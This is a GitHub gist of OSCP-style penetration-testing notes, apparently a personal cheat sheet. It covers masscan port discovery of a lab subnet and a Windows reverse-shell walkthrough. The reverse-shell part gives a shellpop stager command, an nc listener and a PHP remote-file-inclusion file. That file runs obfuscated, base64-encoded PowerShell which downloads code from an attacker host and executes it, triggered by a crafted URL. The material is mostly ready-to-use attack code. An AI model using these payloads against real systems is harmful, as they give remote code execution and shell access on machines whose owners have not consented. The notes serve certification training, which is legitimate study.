Last active
April 11, 2020 03:24
-
-
Save ssstonebraker/883539e7a5a93ad10d9babeb87d02313 to your computer and use it in GitHub Desktop.
OSCP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Discovery | |
## masscan | |
### Top 100 ports TCP/UDP | |
masscan -p7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157,U:2-3,U:7,U:9,U:13,U:17,U:19-23,U:37-38,U:42,U:49,U:53,U:67-69,U:80,U:88,U:111-113,U:120,U:123,U:135-139,U:158,U:161-162,U:177,U:192,U:199,U:207,U:217,U:363,U:389,U:402,U:407,U:427,U:434,U:443,U:445,U:464,U:497,U:500,U:502,U:512-515,U:517-518,U:520,U:539,U:559,U:593,U:623,U:626,U:631,U:639,U:643,U:657,U:664,U:682-689,U:764,U:767,U:772-776,U:780-782,U:786,U:789,U:800,U:814,U:826,U:829,U:838,U:902-903,U:944,U:959,U:965,U:983,U:989-990,U:996-1001,U:1007-1008,U:1012-1014,U:1019-1051,U:1053-1060,U:1064-1070,U:1072,U:1080-1081,U:1087-1088,U:1090,U:1100-1101,U:1105,U:1124,U:1200,U:1214,U:1234,U:1346,U:1419,U:1433-1434,U:1455,U:1457,U:1484-1485,U:1524,U:1645-1646,U:1701,U:1718-1719,U:1761,U:1782,U:1804,U:1812-1813,U:1885-1886,U:1900-1901,U:1993,U:2000,U:2002,U:2048-2049,U:2051,U:2148,U:2160-2161,U:2222-2223,U:2343,U:2345,U:2362,U:2967,U:3052,U:3130,U:3283,U:3296,U:3343,U:3389,U:3401,U:3456-3457,U:3659,U:3664,U:3702-3703,U:4000,U:4008,U:4045,U:4444,U:4500,U:4666,U:4672,U:5000-5003,U:5010,U:5050,U:5060,U:5093,U:5351,U:5353,U:5355,U:5500,U:5555,U:5632,U:6000-6002,U:6004,U:6050,U:6346-6347,U:6970-6971,U:7000,U:7938,U:8000-8001,U:8010,U:8181,U:8193,U:8900,U:9000-9001,U:9020,U:9103,U:9199-9200,U:9370,U:9876-9877,U:9950 10.11.1.0/24 --rate=1000 -e tun0 --router-ip 10.11.0.1 > masscan_top100_entire_subnet_tcp_udp.txt | |
sed -i 's|Discovered open port ||g' masscan_top100_entire_subnet_tcp_udp.txt | |
awk '{ print $3 , $1}' masscan_top100_entire_subnet_tcp_udp.txt | sort -t . -k 3,3n -k 4,4n > final_lab_open_ports_tcp_udp.txt | |
# Shells | |
## Reverse Shells | |
### Windows Reverse Shell Howto | |
# Generate Payload | |
shellpop --payload windows/reverse/tcp/powershell --host tun0 --port 4444 --handler --base64 --stager http | |
# run listener (attacking machine) | |
nc -nlvp 4444 | |
# Set up remote file inclusion (attacker) | |
[root@kali:/var/www/html]# cat test.txt | |
<?php echo Shell_Exec ('powershell.exe -nop -w hidden -ep bypass -Encoded JAB4AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAHgALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJAB4AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAJABwAD0AJAB4AC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxADEAOQAuADEANQAyADoAOAAwADgAMAAvAEMAYQBmAGIAcwBXAFoAZwAnACkAOwBjAG0AZAAuAGUAeABlACAALwBjACAAJABwACAA'); ?> | |
# Perform the RFI attack (attacking machine) | |
Browse to http://192.168.152.10/menu.php?file=http://192.168.119.152/test.txt |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment